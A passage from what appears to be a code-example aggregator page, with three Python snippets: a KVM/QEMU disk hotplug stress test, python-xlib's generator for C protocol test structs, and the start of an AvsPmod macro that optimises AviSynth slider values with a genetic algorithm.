        err += disks.check_disk_params(params)
        (tmp1, tmp2, _, _) = disks.check_guests_proc_scsi(proc_scsi)
        err += tmp1 + tmp2
        if err:
            logging.error("info qtree:\n%s", info_qtree)
            logging.error("info block:\n%s", info_block)
            logging.error("/proc/scsi/scsi:\n%s", proc_scsi)
            logging.error(qdev.str_bus_long())
            raise error.TestFail("%s errors occurred while verifying"
                                 " qtree vs. params" % err)

    def insert_into_qdev(qdev, param_matrix, no_disks, params, new_devices):
        """
        Inserts no_disks disks int qdev using randomized args from param_matrix
        :param qdev: qemu devices container
        :type qdev: virttest.qemu_devices.qcontainer.DevContainer
        :param param_matrix: Matrix of randomizable params
        :type param_matrix: list of lists
        :param no_disks: Desired number of disks
        :type no_disks: integer
        :param params: Dictionary with the test parameters
        :type params: virttest.utils_params.Params
        :return: (newly added devices, number of added disks)
        :rtype: tuple(list, integer)
        """
        dev_idx = 0
        _new_devs_fmt = ""
        _formats = param_matrix.pop('fmt', [params.get('drive_format')])
        formats = _formats[:]
        if len(new_devices) == 1:
            strict_mode = None
        else:
            strict_mode = True
        i = 0
        while i < no_disks:
            # Set the format
            if len(formats) < 1:
                if i == 0:
                    raise error.TestError("Fail to add any disks, probably bad"
                                          " configuration.")
                logging.warn("Can't create desired number '%s' of disk types "
                             "'%s'. Using '%d' no disks.", no_disks,
                             _formats, i)
                break
            name = 'stg%d' % i
            args = {'name': name, 'filename': stg_image_name % i}
            fmt = random.choice(formats)
            if fmt == 'virtio_scsi':
                args['fmt'] = 'scsi-hd'
                args['scsi_hba'] = 'virtio-scsi-pci'
            elif fmt == 'lsi_scsi':
                args['fmt'] = 'scsi-hd'
                args['scsi_hba'] = 'lsi53c895a'
            elif fmt == 'spapr_vscsi':
                args['fmt'] = 'scsi-hd'
                args['scsi_hba'] = 'spapr-vscsi'
            else:
                args['fmt'] = fmt
            # Other params
            for key, value in param_matrix.iteritems():
                args[key] = random.choice(value)

            try:
                devs = qdev.images_define_by_variables(**args)
                # parallel test adds devices in mixed order, force bus/addrs
                qdev.insert(devs, strict_mode)
            except utils.DeviceError:
                for dev in devs:
                    if dev in qdev:
                        qdev.remove(dev, recursive=True)
                formats.remove(fmt)
                continue

            params = convert_params(params, args)
            env_process.preprocess_image(test, params.object_params(name),
                                         name)
            new_devices[dev_idx].extend(devs)
            dev_idx = (dev_idx + 1) % len(new_devices)
            _new_devs_fmt += "%s(%s) " % (name, fmt)
            i += 1
        if _new_devs_fmt:
            logging.info("Using disks: %s", _new_devs_fmt[:-1])
        param_matrix['fmt'] = _formats
        return new_devices, params

    def _hotplug(new_devices, monitor, prefix=""):
        """
        Do the actual hotplug of the new_devices using monitor monitor.
        :param new_devices: List of devices which should be hotplugged
        :type new_devices: List of virttest.qemu_devices.qdevice.QBaseDevice
        :param monitor: Monitor which should be used for hotplug
        :type monitor: virttest.qemu_monitor.Monitor
        """
        hotplug_outputs = []
        hotplug_sleep = float(params.get('wait_between_hotplugs', 0))
        for device in new_devices:      # Hotplug all devices
            time.sleep(hotplug_sleep)
            hotplug_outputs.append(device.hotplug(monitor))
        time.sleep(hotplug_sleep)
        failed = []
        passed = []
        unverif = []
        for device in new_devices:      # Verify the hotplug status
            out = hotplug_outputs.pop(0)
            out = device.verify_hotplug(out, monitor)
            if out is True:
                passed.append(str(device))
            elif out is False:
                failed.append(str(device))
            else:
                unverif.append(str(device))
        if not failed and not unverif:
            logging.debug("%sAll hotplugs verified (%s)", prefix, len(passed))
        elif not failed:
            logging.warn("%sHotplug status:\nverified %s\nunverified %s",
                         prefix, passed, unverif)
        else:
            logging.error("%sHotplug status:\nverified %s\nunverified %s\n"
                          "failed %s", prefix, passed, unverif, failed)
            logging.error("qtree:\n%s", monitor.info("qtree", debug=False))
            raise error.TestFail("%sHotplug of some devices failed." % prefix)

    def hotplug_serial(new_devices, monitor):
        _hotplug(new_devices[0], monitor)

    def hotplug_parallel(new_devices, monitors):
        threads = []
        for i in xrange(len(new_devices)):
            name = "Th%s: " % i
            logging.debug("%sworks with %s devices", name,
                          [_.str_short() for _ in new_devices[i]])
            thread = threading.Thread(target=_hotplug, name=name[:-2],
                                      args=(new_devices[i], monitors[i], name))
            thread.start()
            threads.append(thread)
        for thread in threads:
            thread.join()
        logging.debug("All threads finished.")

    def _postprocess_images():
        # remove and check the images
        _disks = []
        for disk in params['images'].split(' '):
            if disk.startswith("stg"):
                env_process.postprocess_image(test, params.object_params(disk),
                                              disk)
            else:
                _disks.append(disk)
            params['images'] = " ".join(_disks)

    def _unplug(new_devices, qdev, monitor, prefix=""):
        """
        Do the actual unplug of new_devices using monitor monitor
        :param new_devices: List of devices which should be hotplugged
        :type new_devices: List of virttest.qemu_devices.qdevice.QBaseDevice
        :param qdev: qemu devices container
        :type qdev: virttest.qemu_devices.qcontainer.DevContainer
        :param monitor: Monitor which should be used for hotplug
        :type monitor: virttest.qemu_monitor.Monitor
        """
        unplug_sleep = float(params.get('wait_between_unplugs', 0))
        unplug_outs = []
        unplug_devs = []
        for device in new_devices[::-1]:    # unplug all devices
            if device in qdev:  # Some devices are removed with previous one
                time.sleep(unplug_sleep)
                unplug_devs.append(device)
                unplug_outs.append(device.unplug(monitor))
                # Remove from qdev even when unplug failed because further in
                # this test we compare VM with qdev, which should be without
                # these devices. We can do this because we already set the VM
                # as dirty.
                if LOCK:
                    LOCK.acquire()
                qdev.remove(device)
                if LOCK:
                    LOCK.release()
        time.sleep(unplug_sleep)
        failed = []
        passed = []
        unverif = []
        for device in unplug_devs:          # Verify unplugs
            _out = unplug_outs.pop(0)
            # unplug effect can be delayed as it waits for OS respone before
            # it removes the device form qtree
            for _ in xrange(50):
                out = device.verify_unplug(_out, monitor)
                if out is True:
                    break
                time.sleep(0.1)
            if out is True:
                passed.append(str(device))
            elif out is False:
                failed.append(str(device))
            else:
                unverif.append(str(device))

        if not failed and not unverif:
            logging.debug("%sAll unplugs verified (%s)", prefix, len(passed))
        elif not failed:
            logging.warn("%sUnplug status:\nverified %s\nunverified %s",
                         prefix, passed, unverif)
        else:
            logging.error("%sUnplug status:\nverified %s\nunverified %s\n"
                          "failed %s", prefix, passed, unverif, failed)
            logging.error("qtree:\n%s", monitor.info("qtree", debug=False))
            raise error.TestFail("%sUnplug of some devices failed." % prefix)

    def unplug_serial(new_devices, qdev, monitor):
        _unplug(new_devices[0], qdev, monitor)

    def unplug_parallel(new_devices, qdev, monitors):
        threads = []
        for i in xrange(len(new_devices)):
            name = "Th%s: " % i
            logging.debug("%sworks with %s devices", name,
                          [_.str_short() for _ in new_devices[i]])
            thread = threading.Thread(target=_unplug,
                                      args=(new_devices[i], qdev, monitors[i]))
            thread.start()
            threads.append(thread)
        for thread in threads:
            thread.join()
        logging.debug("All threads finished.")

    def verify_qtree_unsupported(params, info_qtree, info_block, proc_scsi,
                                 qdev):
        return logging.warn("info qtree not supported. Can't verify qtree vs. "
                            "guest disks.")

    vm = env.get_vm(params['main_vm'])
    qdev = vm.devices
    session = vm.wait_for_login(timeout=int(params.get("login_timeout", 360)))
    out = vm.monitor.human_monitor_cmd("info qtree", debug=False)
    if "unknown command" in str(out):
        verify_qtree = verify_qtree_unsupported

    stg_image_name = params['stg_image_name']
    if not stg_image_name[0] == "/":
        stg_image_name = "%s/%s" % (data_dir.get_data_dir(), stg_image_name)
    stg_image_num = int(params['stg_image_num'])
    stg_params = params.get('stg_params', '').split(' ')
    i = 0
    while i < len(stg_params) - 1:
        if not stg_params[i].strip():
            i += 1
            continue
        if stg_params[i][-1] == '\\':
            stg_params[i] = '%s %s' % (stg_params[i][:-1],
                                       stg_params.pop(i + 1))
        i += 1

    param_matrix = {}
    for i in xrange(len(stg_params)):
        if not stg_params[i].strip():
            continue
        (cmd, parm) = stg_params[i].split(':', 1)
        # ',' separated list of values
        parm = parm.split(',')
        j = 0
        while j < len(parm) - 1:
            if parm[j][-1] == '\\':
                parm[j] = '%s,%s' % (parm[j][:-1], parm.pop(j + 1))
            j += 1

        param_matrix[cmd] = parm

    # Modprobe the module if specified in config file
    module = params.get("modprobe_module")
    if module:
        session.cmd("modprobe %s" % module)

    stress_cmd = params.get('stress_cmd')
    if stress_cmd:
        funcatexit.register(env, params.get('type'), stop_stresser, vm,
                            params.get('stress_kill_cmd'))
        stress_session = vm.wait_for_login(timeout=10)
        for _ in xrange(int(params.get('no_stress_cmds', 1))):
            stress_session.sendline(stress_cmd)

    rp_times = int(params.get("repeat_times", 1))
    queues = params.get("multi_disk_type") == "parallel"
    if queues:  # parallel
        queues = xrange(len(vm.monitors))
        hotplug = hotplug_parallel
        unplug = unplug_parallel
        monitor = vm.monitors
        global LOCK
        LOCK = threading.Lock()
    else:   # serial
        queues = xrange(1)
        hotplug = hotplug_serial
        unplug = unplug_serial
        monitor = vm.monitor
    context_msg = "Running sub test '%s' %s"
    error.context("Verify disk before test", logging.info)
    info_qtree = vm.monitor.info('qtree', False)
    info_block = vm.monitor.info_block(False)
    proc_scsi = session.cmd_output('cat /proc/scsi/scsi')
    verify_qtree(params, info_qtree, info_block, proc_scsi, qdev)
    for iteration in xrange(rp_times):
        error.context("Hotplugging/unplugging devices, iteration %d"
                      % iteration, logging.info)
        sub_type = params.get("sub_type_before_plug")
        if sub_type:
            error.context(context_msg % (sub_type, "before hotplug"),
                          logging.info)
            utils_test.run_virt_sub_test(test, params, env, sub_type)

        error.context("Insert devices into qdev", logging.debug)
        qdev.set_dirty()
        new_devices = [[] for _ in queues]
        new_devices, params = insert_into_qdev(qdev, param_matrix,
                                               stg_image_num, params,
                                               new_devices)

        error.context("Hotplug the devices", logging.debug)
        hotplug(new_devices, monitor)
        time.sleep(float(params.get('wait_after_hotplug', 0)))

        error.context("Verify disks after hotplug", logging.debug)
        info_qtree = vm.monitor.info('qtree', False)
        info_block = vm.monitor.info_block(False)
        vm.verify_alive()
        proc_scsi = session.cmd_output('cat /proc/scsi/scsi')
        verify_qtree(params, info_qtree, info_block, proc_scsi, qdev)
        qdev.set_clean()

        sub_type = params.get("sub_type_after_plug")
        if sub_type:
            error.context(context_msg % (sub_type, "after hotplug"),
                          logging.info)
            utils_test.run_virt_sub_test(test, params, env, sub_type)

        sub_type = params.get("sub_type_before_unplug")
        if sub_type:
            error.context(context_msg % (sub_type, "before hotunplug"),
                          logging.info)
            utils_test.run_virt_sub_test(test, params, env, sub_type)

        error.context("Unplug and remove the devices", logging.debug)
        if stress_cmd:
            session.cmd(params["stress_stop_cmd"])
        unplug(new_devices, qdev, monitor)
        if stress_cmd:
            session.cmd(params["stress_cont_cmd"])
        _postprocess_images()

        error.context("Verify disks after unplug", logging.debug)
        time.sleep(float(params.get('wait_after_unplug', 0)))
        info_qtree = vm.monitor.info('qtree', False)
        info_block = vm.monitor.info_block(False)
        vm.verify_alive()
        proc_scsi = session.cmd_output('cat /proc/scsi/scsi')
        verify_qtree(params, info_qtree, info_block, proc_scsi, qdev)
        # we verified the unplugs, set the state to 0
        for _ in xrange(qdev.get_state()):
            qdev.set_clean()

        sub_type = params.get("sub_type_after_unplug")
        if sub_type:
            error.context(context_msg % (sub_type, "after hotunplug"),
                          logging.info)
            utils_test.run_virt_sub_test(test, params, env, sub_type)

    # Check for various KVM failures
    error.context("Validating VM after all disk hotplug/unplugs",
                  logging.debug)
    vm.verify_alive()
    out = session.cmd_output('dmesg')
    if "I/O error" in out:
        logging.warn(out)
        raise error.TestWarn("I/O error messages occured in dmesg, check"
                             "the log for details.")

Example 42

Project: python-xlib
Source File: genprottest.py
View license
def gen_func(fc, funcname, structname, outputname, pydef, cdef, vardefs):
    fc.write('''void %s(void)
    {
      struct {
        %s xstruct;
        ''' % (funcname, structname))

    args = {}
    varfs = {}
    extra_vars = []
    flags = None

    # structure fields etc
    i = 0
    for f in pydef.var_fields:
        #
        # List of something
        #
        if isinstance(f, rq.List):
            #
            # List of short strings
            #
            if f.type is rq.Str:
                vfstrings = vardefs[i]
                vflen = 0
                vfdata = ''
                for s in vfstrings:
                    vflen = vflen + 1 + len(s)
                    vfdata = vfdata + chr(len(s)) + s

                fc.write('unsigned char %s[%d];\n      '
                         % (f.name, pad4(vflen)))
                varfs[f.name] = ('memcpy(data.%s, %s, %d);'
                                 % (f.name, cstring(vfdata), vflen),
                                 len(vfstrings), 0)
                args[f.name] = vfstrings

            #
            # List of scalars
            #
            elif isinstance(f.type, rq.ScalarObj) \
                 or isinstance(f.type, rq.ResourceObj):

                vflen = vardefs[i]

                if f.type.structcode == 'B':
                    rmin = 128
                    rmax = 255
                    deflen = pad4(vflen)
                    ctype = 'CARD8'
                elif f.type.structcode == 'H':
                    rmin = 32768
                    rmax = 65536
                    deflen = vflen + vflen % 2
                    ctype = 'CARD16'
                elif f.type.structcode == 'L':
                    rmin = 65536
                    rmax = 2147483646
                    deflen = vflen
                    ctype = 'CARD32'
                else:
                    RuntimeError('oops: %s' % f.type.structcode)

                def rand(x, rmin = rmin, rmax = rmax):
                    return randint(rmin, rmax)

                vfdata = list(map(rand, range(0, vflen)))

                #
                # Special case for a few in-line coded lists
                #
                if structname in ('xGetKeyboardControlReply',
                                  'xQueryKeymapReply',
                                  'xKeymapEvent'):
                    extra_vars.append('%s %s_def[%d] = { %s };'
                                      % (ctype, f.name, vflen,
                                         ', '.join(map(str, vfdata))))
                    varfs[f.name] = ('memcpy(data.xstruct.map, %s_def, sizeof(%s_def));'
                                     % (f.name, f.name),
                                     vflen, 0)
                else:
                    fc.write('%s %s[%d];\n      '
                             % (ctype, f.name, deflen))
                    extra_vars.append('%s %s_def[%d] = { %s };'
                                      % (ctype, f.name, vflen,
                                         ', '.join(map(str, vfdata))))
                    varfs[f.name] = ('memcpy(data.%s, %s_def, sizeof(%s_def));'
                                     % (f.name, f.name, f.name),
                                     vflen, 0)

                args[f.name] = vfdata

            #
            # Special handling of unique Host case
            #
            elif f.type is structs.Host:
                pydata = [{ 'family': X.FamilyInternet,
                            'name': [ 34, 23, 178, 12 ] },
                          { 'family': X.FamilyInternet,
                            'name': [ 130, 236, 254, 15 ] }, ]

                cdata = []
                for p in pydata:
                    cdata.append("{ { %d, 0, 4 }, { %d, %d, %d, %d } }"
                                 % ((p['family'], ) + tuple(p['name'])))

                fc.write('struct { xHostEntry e; CARD8 name[4]; } %s[2];\n      ' % f.name)

                extra_vars.append('struct { xHostEntry e; CARD8 name[4]; } %s_def[%d] = { %s };'
                                  % (f.name, len(pydata),
                                     ', '.join(cdata)))

                varfs[f.name] = ('memcpy(data.%s, %s_def, sizeof(%s_def));'
                                 % (f.name, f.name, f.name),
                                 len(pydata), 0)

                args[f.name] = pydata


            #
            # List of structures
            #
            elif isinstance(f.type, rq.Struct):
                vfname, vflen = vardefs[i]
                vfdef = struct_defs[vfname]

                pydata = []
                defdata = []
                for si in range(0, vflen):
                    d = []
                    for t, cf in vfdef:
                        if cf[:3] != 'pad':
                            d.append(gen_value(t))

                    pyd = {}
                    for sj in range(0, len(d)):
                        pyd[f.type.fields[sj].name] = d[sj]

                    pydata.append(pyd)
                    defdata.append('{ ' + ', '.join(map(str, d)) + ' }')

                fc.write('x%s %s[%d];\n        ' % (vfname, f.name, vflen))

                extra_vars.append('x%s %s_def[%d] = { %s };'
                                  % (vfname, f.name, vflen,
                                     ', '.join(defdata)))
                varfs[f.name] = ('memcpy(data.%s, %s_def, sizeof(%s_def));'
                                 % (f.name, f.name, f.name),
                                 vflen, 0)
                args[f.name] = pydata

        #
        # wide-char string
        #
        elif isinstance(f, rq.String16):
            vfstr = vardefs[i]
            vflen = len(vfstr)

            fc.write('unsigned char %s[%d];\n        ' %
                     (f.name, (vflen + vflen % 2) * 2))

            s = ''
            for c in vfstr:
                s = s + '\0' + c

            varfs[f.name] = ('memcpy(data.%s, %s, %d);'
                             % (f.name, cstring(s), vflen * 2),
                             vflen, 0)
            args[f.name] = tuple(map(ord, vfstr))

        #
        # byte-char string
        #
        elif isinstance(f, rq.String8):
            vfstr = vardefs[i]
            vflen = len(vfstr)

            fc.write('unsigned char %s[%d];\n        ' %
                     (f.name, (vflen + (4 - vflen % 4) % 4)))
            varfs[f.name] = ('memcpy(data.%s, %s, %d);'
                             % (f.name, cstring(vfstr), vflen),
                             vflen, 0)
            args[f.name] = vfstr

        #
        # List of optional values
        #
        elif isinstance(f, rq.ValueList):
            vlcode = []
            vlargs = {}
            flags = 0
            for vlf, flag in f.fields:
                ctype, rmin, rmax, clen = structcode_defs[vlf.structcode]
                fc.write('%s %s_%s;\n      '
                         % (ctype, f.name, vlf.name))
                if clen < 4:
                    fc.write('unsigned char %s_%s_pad[%d];\n      '
                             % (f.name, vlf.name, 4 - clen))

                if isinstance(vlf, rq.Set):
                    val = choice(vlf.values)
                elif isinstance(vlf, rq.Bool):
                    val = choice((0, 1))
                else:
                    val = randint(rmin, rmax)
                vlargs[vlf.name] = val
                vlcode.append('data.%s_%s = %d;' % (f.name, vlf.name, val))
                flags = flags | flag

            # vlcode.append('data.%s_flags = %d;' % (f.name, flags))

            varfs[f.name] = (' '.join(vlcode), 0, 0)
            args[f.name] = vlargs

        #
        # Text/font list, hardwire since they are so rare
        #
        elif isinstance(f, rq.TextElements8):
            if isinstance(f, rq.TextElements16):
                vfstr = b'\x02\x02\x10\x23\x00\x12\xff\x01\x02\x03\x04'
                ret = [{'delta': 2, 'string': (0x1023, 0x0012)},
                       0x01020304]
            else:
                vfstr = b'\x03\x02zoo\xff\x01\x02\x03\x04\x02\x00ie'
                ret = [{'delta': 2, 'string': 'zoo'},
                       0x01020304,
                       { 'delta': 0, 'string': 'ie'}]

            fc.write('unsigned char %s[%d];\n      '
                     % (f.name, len(vfstr)))
            varfs[f.name] = ('memcpy(data.%s, %s, %d);'
                             % (f.name, cstring(vfstr), len(vfstr)),
                             0, 0)
            args[f.name] = ret

        #
        # Keyboard/modifier mappings
        #
        elif isinstance(f, rq.KeyboardMapping) \
             or isinstance(f, rq.ModifierMapping):

            if isinstance(f, rq.KeyboardMapping):
                rmin = 0
                rmax = 2147483646
                length = 20
                format = 3
                ctype = 'CARD32'
            else:
                rmin = 0
                rmax = 255
                length = 8
                format = 2
                ctype = 'CARD8'

            pydata = []
            cdata = []
            for i in range(0, length):
                x = []
                for j in range(0, format):
                    v = randint(rmin, rmax)
                    x.append(v)
                    cdata.append(str(v))
                pydata.append(x)

            fc.write('%s %s[%d];\n      ' % (ctype, f.name, len(cdata)))
            extra_vars.append('%s %s_def[%d] = { %s };'
                              % (ctype, f.name, len(cdata),
                                 ', '.join(cdata)))
            varfs[f.name] = ('memcpy(data.%s, %s_def, sizeof(%s_def));'
                             % (f.name, f.name, f.name),
                             length, format)
            args[f.name] = pydata

        #
        # property data
        #
        elif isinstance(f, rq.PropertyData):
            format, data = vardefs[i]
            length = len(data)

            if format == 8:
                ctype = 'CARD8'
                clen = pad4(length)
                cdata = cstring(data)
            elif format == 16:
                ctype = 'CARD16'
                clen = length + length % 2
                cdata = ', '.join(map(str, data))
            elif format == 32:
                ctype = 'CARD32'
                clen = length
                cdata = ', '.join(map(str, data))

            if not isinstance(f, rq.FixedPropertyData):
                fc.write('%s %s[%d];\n        ' %
                         (ctype, f.name, clen))

            extra_vars.append('%s %s_def[%d] = { %s };'
                              % (ctype, f.name, length, cdata))

            if not isinstance(f, rq.FixedPropertyData):
                varfs[f.name] = ('memcpy(data.%s, %s_def, sizeof(%s_def));'
                                 % (f.name, f.name, f.name),
                                 length, format)
            else:
                varfs[f.name] = ('assert(sizeof(%s_def) == 20); memcpy(data.xstruct.u.clientMessage.u.b.bytes, %s_def, sizeof(%s_def));'
                                 % (f.name, f.name, f.name),
                                 length, format)

            args[f.name] = (format, data)

        #
        # Event
        #
        elif isinstance(f, rq.EventField):
            ev = event.Expose(window = gen_value('CARD32'),
                              x = gen_value('CARD16'),
                              y =  gen_value('CARD16'),
                              width = gen_value('CARD16'),
                              height = gen_value('CARD16'),
                              count = gen_value('CARD16'))
            cdata = cstring(ev._binary)

            # fc.write('unsigned char %s[32];\n        ' % f.name)
            extra_vars.append('unsigned char %s_def[32] = %s;'
                              % (f.name, cdata))
            varfs[f.name] = ('memcpy(&data.xstruct.event, %s_def, sizeof(%s_def));'
                             % (f.name, f.name),
                             0, 0)

            args[f.name] = ev

        else:
            raise RuntimeError('oops: %s.%s' % (funcname, f.name))

        i = i + 1


    fc.write('\n      } data;\n')


    for v in extra_vars:
        fc.write('      %s\n' % v)

    fc.write('''
      memset(&data, 0, sizeof(data));

    ''')

    pyi = 0
    ci = 0

    while ci < len(cdef):
        try:
            pyf = pydef.fields[pyi]
        except IndexError:
            pyf = None

        cf = cdef[ci]
        t, f = cf

        pyi = pyi + 1
        ci = ci + 1

        if f[:3] == 'pad' or f[:6] == 'walign':
            if not isinstance(pyf, rq.Pad):
                pyi = pyi - 1

        # special case for value list mask
        elif (f == 'mask' or f == 'valueMask') and flags is not None:
            fc.write('      data.xstruct.%s = %d;\n' % (f, flags))

        elif isinstance(pyf, rq.ConstantField):
            fc.write('      data.xstruct.%s = %d;\n' % (f, pyf.value))

        elif isinstance(pyf, rq.RequestLength):
            assert f == 'length'

            fc.write('      assert(sizeof(data) % 4 == 0);\n')
            fc.write('      data.xstruct.length = sizeof(data) / 4;\n')

        elif isinstance(pyf, rq.ReplyLength):
            assert f == 'length'

            fc.write('      assert(sizeof(data) % 4 == 0);\n')
            fc.write('      assert(sizeof(data) >= 32);\n')
            fc.write('      data.xstruct.length = (sizeof(data) - 32) / 4;\n')

        elif isinstance(pyf, rq.LengthOf):
            fc.write('      data.xstruct.%s = %d;\n' % (f, varfs[pyf.name][1]))

        elif isinstance(pyf, rq.OddLength):
            fc.write('      data.xstruct.%s = %d;\n' % (f, varfs[pyf.name][1] % 2))

        elif isinstance(pyf, rq.Format):
            fc.write('      data.xstruct.%s = %d;\n' % (f, varfs[pyf.name][2]))

        elif isinstance(pyf, rq.Set):
            val = choice(pyf.values)
            fc.write('      data.xstruct.%s = %d;\n' % (f, val))
            args[pyf.name] = val

        elif t == 'xCharInfo':
            d = []
            for ct, cf in struct_defs['CharInfo']:
                if cf[:3] != 'pad':
                    d.append(gen_value(ct))

            pyd = {}
            for sj in range(0, len(d)):
                pyd[pyf.type.fields[sj].name] = d[sj]

            fc.write('{ %s def = { %s };\n      '
                     % (t, ', '.join(map(str, d))))
            fc.write('memcpy(&data.xstruct.%s, &def, sizeof(def)); }\n        ' % f)
            args[pyf.name] = pyd

        else:
            val = gen_value(t)
            fc.write('      data.xstruct.%s = %d;\n' % (f, val))
            args[pyf.name] = val

    for code, length, format in varfs.values():
        fc.write('      %s\n' % code);

    fc.write('''
      output("%s", &data, sizeof(data));
    }

    ''' % outputname)

    return args

Example 43

Project: AvsPmod
Source File: [7] Optimize Sliders.py
View license
def main():
    import random
    import math
    import subprocess
    import os
    import os.path
    
    app = avsp.GetWindow()
    params = []
    scriptTemplate = ''
    logfilename = 'log.txt'
    avs2avidir = os.path.join(app.toolsfolder, 'avs2avi.exe')
    
    # Simple Genetic Algorithm implementation
    class SGA(object):
        def __init__(self,
                chromosome_length,
                objective_function,
                population_size=100,
                probability_crossover=0.5,
                probability_mutation=0.01,
                selection_pressure=4,
                max_generations=10,
                minimize=True,
                dump_function=None):
            # Define the variables for the key GA parameters
            SGA.length = chromosome_length
            self.objfn = objective_function
            self.n = population_size - population_size % 2
            self.pc = probability_crossover
            self.pm = probability_mutation
            self.s = selection_pressure
            self.maxgen = max_generations
            SGA.minimize = minimize
            self.dump = dump_function
            self.generation = 0
            self.scoreDict = {}
            # Define the individual class
            class Individual(object):
                def __init__(self, chromosome=None):
                    self.length = SGA.length
                    self.minimize = SGA.minimize
                    self.score = None
                    self.chromosome = chromosome
                    if self.chromosome is None:
                        self.chromosome = [random.choice((0,1)) for i in xrange(self.length)]
                        
                def __cmp__(self, other):
                    if self.minimize:
                        return cmp(self.score, other.score)
                    else:
                        return cmp(other.score, self.score)                    
                        
                def copy(self):
                    twin = self.__class__(self.chromosome[:])
                    twin.score = self.score
                    return twin
            self.Individual = Individual
            
        def run(self):
            # Create the initial population (generation 0)
            self.population = [self.Individual() for i in range(self.n)]
            try:
                pb = avsp.ProgressBox(self.n, _('Initial evaluation...'), _('Generation 0 Progress'))
            except NameError:
                pb = None
            try:
                for i, individual in enumerate(self.population):
                    self.evaluate(individual)
                    if pb is not None:
                        if not pb.Update(i)[0]:
                            pb.Destroy()
                            return False
                # Dump the best data from this generation
                best = min(self.population)
                initialscore = best.score
                if self.dump is not None:
                    self.dump(best.chromosome, best.score)
                if pb is not None:
                    pb.Destroy()
                self.generation += 1
                # Run the genetic algorithm
                while self.generation < self.maxgen:
                    # Create a progress bar for this generation
                    if pb is not None:
                        pb = avsp.ProgressBox(
                            self.n,
                            _('Initial best score: %.3f, Current best score: %.3f') % (initialscore, best.score),
                            'Generation %i Progress' % self.generation
                        )
                    newpopulation = [best.copy()]
                    count = len(newpopulation)
                    while count < self.n:
                    #~ for i in xrange(self.n/2):
                        # Selection
                        mate1 = self.selection()
                        mate2 = self.selection()
                        # Crossover
                        children = self.crossover(mate1, mate2)
                        for individual in children:
                            # Mutation
                            self.mutation(individual)
                            # Evaluate the individual and add it to the new population
                            self.evaluate(individual)
                            newpopulation.append(individual)
                        # Update the progress bar
                        count = len(newpopulation)
                        if pb is not None:
                            i = min(count-1, self.n-1)
                            if not pb.Update(i)[0]:
                                pb.Destroy()
                                return False
                    # Update the internally stored population
                    self.population = newpopulation[:self.n]
                    # Dump the best data from this generation
                    best = min(self.population)
                    if self.dump is not None:
                        self.dump(best.chromosome, best.score)
                    # Destroy the progress bar for this generation
                    if pb is not None:
                        pb.Destroy()
                    self.generation += 1
            finally:
                if pb is not None:
                    pb.Destroy()
            return True
            
        def crossover(self, individual1, individual2):
            '''Two point crossover'''
            if random.random() < self.pc:
                # Pick the crossover points randomly
                left = random.randrange(1, self.length-2)
                right = random.randrange(left, self.length-1)
                # Create the children chromosomes
                p1 = individual1.chromosome
                p2 = individual2.chromosome
                c1 = p1[:left] + p2[left:right] + p1[right:]
                c2 = p2[:left] + p1[left:right] + p2[right:]
                # Return the new individuals
                return self.Individual(c1), self.Individual(c2)
            else:
                # Don't perform crossover
                return individual1.copy(), individual2.copy()
            
        def mutation(self, individual):
            '''Bit-flip mutation'''
            # Randomly flip each bit in the chromosome
            chromosome = individual.chromosome
            for gene in xrange(self.length):
                if random.random() < self.pm:
                    chromosome[gene] = int(not chromosome[gene])
                    
        def selection(self):
            '''Tournament selection with replacement'''
            # Return best individual from s randomly selected members
            competitors = [random.choice(self.population) for i in range(self.s)]
            #~ competitors.sort()
            #~ return competitors[0]
            return min(competitors)
            
        def evaluate(self, individual):
            intChromosome = binary2int(individual.chromosome)
            if self.scoreDict.has_key(intChromosome):
                # The chromosome was evaluated previously
                individual.score = self.scoreDict[intChromosome]
            else:
                # Run the objective function to evaluate the chromosome
                individual.score = self.objfn(individual.chromosome)
                self.scoreDict[intChromosome] = individual.score
                
    def binary2int(x):
        '''decode a binary list to a single unsigned integer'''
        return sum(map(lambda z: int(x[z]) and 2**(len(x) - z - 1),  range(len(x)-1, -1, -1)))
        
    def decode_params(bitlist, params):
        '''returns dictionary of values for each param'''
        iA = 0
        paramDict = {}
        for name, valuelist, nbits in params:
            iB = iA + nbits
            sublist = bitlist[iA:iB]
            #~ value = min + binary2int(sublist) * (max-min)/float(2**nbits - 1)
            #~ if type(min) == bool:
                #~ value = bool(value)
            index = int(binary2int(sublist) * (len(valuelist) - 1) / float(2 ** nbits - 1))
            paramDict[name] = valuelist[index]
            iA = iB
        return paramDict    
        
    def evaluate(chromosome):
        # Decode the bit string into the individual parameters
        paramDict = decode_params(chromosome, params)
        # Create the AviSynth script
        script = scriptTemplate % paramDict
        inputavsname = os.path.join(scriptdir, 'ga_evaluate.avs')
        script = app.GetEncodedText(script, bom=True)
        f = open(inputavsname, 'w')
        f.write(script)
        f.close()
        # Encode the video to get the results (dumped to log.txt)
        try:
            os.remove(logfilename)
        except OSError:
            pass
        subprocess.call([avs2avidir, inputavsname, '-q', '-o', 'n', '-c','null'], shell=True)
        # Read the results in log.txt
        if os.path.isfile(logfilename):
            f = open(logfilename, 'r')
            lines = f.readlines()
            f.close()
            score = float(lines[-1].split()[2])
            #~ print 'good!', score
        else:
            score = 0
            #~ print '*** Error, bad script:'
            #~ print script
            #~ print '*** End script'
        return score
        
    def dump(chromosome, score=None):
        '''Write the script to a file'''
        paramDict = decode_params(chromosome, params)
        script = scriptTemplate % paramDict
        script = app.GetEncodedText(script, bom=True)
        f = open(os.path.splitext(filename)[0] + '-optimized.avs', 'w')
        f.write(script)
        f.close()
        if score is not None:
            print _('Best score: %.2f') % score
            
    # MAIN SECTION
    if not avs2avidir or not os.path.isfile(avs2avidir):
        avsp.MsgBox(_('Must configure avs2avi directory to use this macro!'), _('Error'))
        return
    # Save the script
    filename = avsp.SaveScript()
    if not filename:
        return
    if not avsp.UpdateVideo():
        avsp.MsgBox(_('The current Avisynth script contains errors.'), _('Error'))
        return
    scriptdir = os.path.dirname(filename)
    scriptTemplate = avsp.GetText()
    # Parse the script to determine the log filename
    
    # Create the parameters to optimize based on user sliders in the script
    sliderInfoList = avsp.GetSliderInfo()
    if not sliderInfoList:
        avsp.MsgBox(_('Not user sliders on the current Avisynth script!'), _('Error'))
        return
    length = 0
    for text, label, valuelist, nDecimal in sliderInfoList:
        if valuelist is None:
            continue
        mantissa, nbits = math.frexp(len(valuelist))
        if mantissa == 0.5:
            nbits -= 1
        params.append([label, valuelist, nbits])
        length += nbits
        scriptTemplate = scriptTemplate.replace(text, '%('+label+').'+str(nDecimal)+'f')
    # Get basic encoder options with a dialog box
    title = _('Enter optimization info    (%i bits, %i possibilities)') % (length, 2**length)
